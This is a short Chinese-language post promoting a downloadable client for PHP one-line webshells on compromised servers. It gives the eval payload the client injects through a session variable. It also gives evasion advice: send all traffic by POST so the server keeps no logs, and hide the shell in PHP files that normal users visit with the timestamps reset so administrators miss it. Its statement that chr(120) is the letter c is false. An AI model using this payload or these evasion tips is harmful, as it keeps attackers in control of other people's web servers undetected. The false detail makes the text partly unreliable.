文/零魂
1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。

2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST)

大概原理:

一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);

chr(120)就是字母c,为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。

备份下载:zerosoul_PHP_eval_Client